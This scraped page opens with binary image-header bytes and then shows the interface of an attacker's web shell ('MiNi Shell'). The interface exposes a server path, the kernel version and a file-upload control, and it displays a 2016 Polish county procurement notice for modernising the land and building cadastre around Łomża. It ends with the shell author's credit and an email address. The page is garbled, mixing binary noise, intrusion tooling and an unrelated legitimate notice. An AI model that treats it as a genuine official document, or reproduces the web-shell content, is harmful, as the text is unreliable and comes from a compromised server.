JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160215/33114-N-2016.html

<p class="kh_header"><b>Łomża: ewidencji gruntów i budynków (katastru nieruchomości), prowadzonej w systemie TurboEwid, obejmującej obręby gminy Śniadowo, w podziale na część a (3 obręby), część b (3 obręby), część c (3 obręby), oraz 4 obręby gminy Zbójna, (część d)  powiat łomżyński, woj. podlaskie.</b><br>
<b>Numer ogłoszenia: 33114 - 2016; data zamieszczenia: 15.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Szosa Zambrowskiego 1/27, 18-400 Łomża, woj. podlaskie, tel. 086 2156904, faks 086 2156904.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> starosta.blm@powiatypolskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ewidencji gruntów i budynków (katastru nieruchomości), prowadzonej w systemie TurboEwid, obejmującej obręby gminy Śniadowo, w podziale na część a (3 obręby), część b (3 obręby), część c (3 obręby), oraz 4 obręby gminy Zbójna, (część d)  powiat łomżyński, woj. podlaskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres prac obejmował będzie: 
       1.1 Zastąpienie danych określających położenie punktów granicznych współrzędnymi dokładniejszymi, obliczonymi na podstawie danych z bezpośredniego pomiaru, zawartych w operatach technicznych oraz innych dokumentach             przechowywanych w PZGiK.
      1.1.1.Współrzędne punktów granicznych należy obliczyć w oparciu o pomierzone i przeliczone na układ 2000 współrzędne punktów osnowy geodezyjnej, wykorzystując materiały zasobu geodezyjnego i kartograficznego, znajdujące się w PODGIK w Łomży, zawierających dane liczbowe określające położenie punktów granicznych działek (operaty z założenia ewidencji gruntów, rozgraniczenia, podziały, dokumenty sądowe, itp.). Punkty zanumerować w obrębie od 1 do n (numeracja na szkicach podstawowych) i nadać odpowiednie atrybuty. Przyjąć dane matematyczne z operatów wykonanych po przeliczeniu osnów na układ 2000.
              Szkice mogą być wykonane numerycznie lub wykreślone ręcznie w formatach A4 do A1 w sposób czytelny i możliwy do kopiowania. Szkice powinny zawierać następujące elementy: punkty osnowy geodezyjnej, linie pomiarowe, punkty i linie graniczne działek, numery punktów granicznych i numery działek, dane archiwalne określające położenie punktów granicznych, kerg roboty, z której wykonano szkic, nawiązanie do strony operatu z obliczonymi współrzędnymi. 
              W przypadku braku dokumentacji stanowiącej podstawę obliczenia współrzędnych punktów załamania granic lub w przypadku wystąpienia rozbieżności w dokumentacji dotyczącej przebiegu granic a także w przypadku gdy dane z              PODGiK nie zapewniają możliwości określenia położenia punktów granicznych z dokładnością określoną w § 82 rozporządzenia, należy je pozyskać w wyniku pomiarów terenowych  z zachowaniem procedur określonych w § 37,38 i 39 rozporządzenia.
      1.1.2. Ponadto należy dokonać ustalenia i pomiaru granic działek ewidencyjnych w trybie przepisów określonych w § 37,38 i 39 rozporządzenia, na styku z rowami melioracji szczegółowej o nieustalonym stanie własności oraz  linii granicznych      działek, dla których w zasobie PODGiK brak jest dokumentacji, lub jeżeli zawarte w nich dane nie są wiarygodne a w szczególności, w których kontury budynków przecinają granice stanowiące odrębne nieruchomości.
      1.1.3. Zastąpić dotychczasowe dane dotyczące położenia punktów granicznych w bazie egib, dokładniejszymi współrzędnymi obliczonymi w ramach niniejszego opracowania i skorygować przebieg granic klasoużytków związanych z granicami działek.
      1.1.4. Obliczyć  pola  powierzchni działek oraz wykonać porównawcze zestawienie obliczonych powierzchni działek z powierzchniami działek wykazanymi w aktualnej ewidencji gruntów. W przypadku rozbieżności w powierzchni                przekraczającej dopuszczalne odchyłki, która obowiązywała przy obliczeniach metodą analityczno-graficzną , wyjaśnić i opisać przyczyny tych odchyłek. 
     1.1.5.	Do bazy egib wprowadzić powierzchnie działek i klasoużytków z zachowaniem zasad określonych w § 68 ust.1-3 rozporządzenia, w sprawie standardów technicznych (Dz.U. 263 poz.1572 z 2011r). 
              Sporządzić zestawienie w formie tabelarycznej, z wykazaniem w kolumnach następujących informacji: nr.działki, powierzchnia w dotychczasowej bazie ewidencji gruntów, powierzchnia obliczona w wyniku niniejszego opracowania, różnica w powierzchni, powierzchnia przyjęta do do bazy z zachowaniem zasad określonych w § 68 rozporządzenia.
             W przypadku granic spornych, umieścić odpowiedni zapis w części opisowej oraz wyróżnić te granice kolorem  na roboczej (z wydruku)  mapie ewidencyjnej.  
   1.1.6.  Zbadać  zgodność treści Księgi Wieczystej  w dziale I i II z istniejącymi zapisami w ewidencji gruntów i budynków. 
             Wprowadzić do bazy egib brakujące numery KW i uzupełnić już istniejące nr.KW pełnymi numerami.
   1.1.7.  Aktualizacja rastrowych map zasadniczych o zmiany wynikłe z punktu 1.1-1.6.
   1.1.8.  Wykonanie skanowania opracowanego operatu z modernizacji egib. Szczegóły dotyczące metody i jakości skanowania uzgodnić z Kierownikiem PODGiK. Przekazanie zeskanowanych plików na płycie CD lub DWD.
   1.1.9.	Sporządzenie operatów dla zmienionych odcinków granic powiatu celem przekazania do sąsiednich  Powiatowych Ośrodków Dokumentacji Geodezyjnej i Kartograficznej.
   1.2     Uzupełnienie zbioru danych ewidencyjnych budynków.
   1.2.1  Po wykonaniu czynności opisanych w punkcie 2.1.2., należy istniejące w bazie atrybuty x,y naroży budynków zastąpić nowymi, pozyskanymi w trakcie ustalenia granic działek.
   1.2.2 Zaktualizować raster mapy zasadniczej. 
   1.3    Aktualizacja konturów użytków gruntowych i gleboznawczej klasyfikacji gruntów, w tym:
   1.3.1 Aktualizację konturów użytków gruntowych wykonać z wykorzystaniem ortofotomapy, wizji terenowej oraz planów urządzania lasów i wykazów zmian powierzchni leśnych wykonanych do tych planów.
            Zwrócić szczególną uwagę na granicę użytków rolno-leśnych, rowów o nieustalonym stanie władania będących rowami melioracji szczegółowej i rowami będącymi naturalnymi ciekami. Rowom nie stanowiących cieków naturalnych 
            przypisać klasy i użytki gruntów przyległych oraz ustalić kto jest ich posiadaczem poprzez ustalenie granicy pomiędzy nieruchomościami przylegającymi do rowu wg zasad określonych w punkcie 1.3.
            Rowy stanowiące ciek naturalny oznaczyć jako Wp.
   1.3.2 Weryfikację użytków gruntowych wykonać na kopii mapy ewidencyjnej nanosząc w kolorze czerwonym zaistniałe zmiany. Sporządzić wykaz działek wymagających ponownej klasyfikacji w celu wszczęcia przez Zamawiającego             postępowania związanego z gleboznawczą klasyfikacją gruntów. 
  1.3.3  Uzgodnić z Wojewódzkim Zarządem Melioracji i Urządzeń Wodnych, które rowy o nieustalonym stanie posiadania stanowią urządzenia melioracji wodnej szczegółowej, a które są ciekami naturalnymi lub są innymi urządzeniami wodnymi.
  1.3.4 Przeprowadzić gleboznawczą klasyfikację gruntów, o której mowa w pkt 2.2 zgodnie z rozporządzeniem Rady Ministrów z dnia 12.09.2012r., w sprawie gleboznawczej klasyfikacji gruntów (Dz. U. z 2012r. poz.1246). Nie dotyczy rowów 
           szczegółowych melioracji wodnych.
  1.3.5 Na podstawie uzyskanych współrzędnych załamań granic konturów i współrzędnych załamań granic działek  obliczyć pola powierzchni wszystkich klasoużytków i wyrównać do powierzchni działek.  
1.3.6 Powierzchnie klasoużytków w działkach objętych aktualizacją klasyfikacji gleboznawczej w ramach niniejszego opracowania obliczyć i wyrównać do powierzchni działek z precyzją zapisu jak pole powierzchni działek.
1.3.7  Prace związane z gleboznawczą klasyfikacją gruntów wykona upoważniony przez Starostę klasyfikator, posiadający doświadczenie w zakresie wykonywania takich czynności wynikające ze sporządzenia w okresie ostatnich 10 lat co           najmniej 3 projektów ustalenia klasyfikacji, które zostały wykorzystane przez właściwy organ do wydania decyzji w sprawie gleboznawczej klasyfikacji gruntów.
1.3.8  Z rastra mapy zasadniczej usunąć granice klasoużytków
1.4 Wykonanie innych czynności niezbędnych do wykonania założonego celu, a których nie można było przewidzieć w trakcie opracowania niniejszych warunków technicznych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Dopuszcza się udzielanie zamówień uzupełniających na zasadach określonych w art. 67 ust 1 pkt.6 u.p.z.p.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.43.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, że wykonawca posiada uprawnienia do wykonywania działalności lub czynności z geodezji w zakresie objętym zamówieniem, kopie uprawnień zawodowych do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii z zakresu nr 1 i nr 2,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, że posiada niezbędną wiedzę i doświadczenie do wykonywania zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. oświadczenie, ze posiada odpowiedni potencjał techniczny, a także dysponuje pracownikami zdolnymi do wykonania zamówienia,
2. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej w zakresie objętym zamówieniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. oświadczenie, ze posiada odpowiedni potencjał techniczny, a także dysponuje pracownikami zdolnymi do wykonania zamówienia,
2. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej w zakresie objętym zamówieniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatlomzynski.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Łomży, ul. Szosa Zambrowska 1/27, 18-400 Łomża, pokój 113.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2016 godzina 10:00, miejsce: Starostwo Powiatowe w Łomży, ul. Szosa Zambrowska 1/27, 18-400 Łomża, pokój 220.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie modernizacji ewidencji gruntów i budynków część Gminy Śniadowo, obręby: Kołaczki, Koziki, Duchny Młode..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część a:           
Wykonanie modernizacji ewidencji gruntów i budynków część Gminy Śniadowo, obręby: Kołaczki, Koziki, Duchny Młode..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.43.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie modernizacji ewidencji gruntów i budynków część Gminy Śniadowo, obręby: Jemielite Wypychy, Sierzputy Marki, Sierzputy Zagajne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część b.
Wykonanie modernizacji ewidencji gruntów i budynków część Gminy Śniadowo, obręby: Jemielite Wypychy, Sierzputy Marki, Sierzputy Zagajne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.43.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie modernizacji ewidencji gruntów i budynków część Gminy Śniadowo, obręby: Mężenin, Olszewo, Stare Jemielite..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część c.
Wykonanie modernizacji ewidencji gruntów i budynków część Gminy Śniadowo, obręby: Mężenin, Olszewo, Stare Jemielite..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.43.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie modernizacji ewidencji gruntów i budynków część Gminy Zbójna, obręby: Dębniki, Gawrychy, Kuzie, Popiołki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część d.
Wykonanie modernizacji ewidencji gruntów i budynków część Gminy Zbójna, obręby: Dębniki, Gawrychy, Kuzie, Popiołki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.43.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com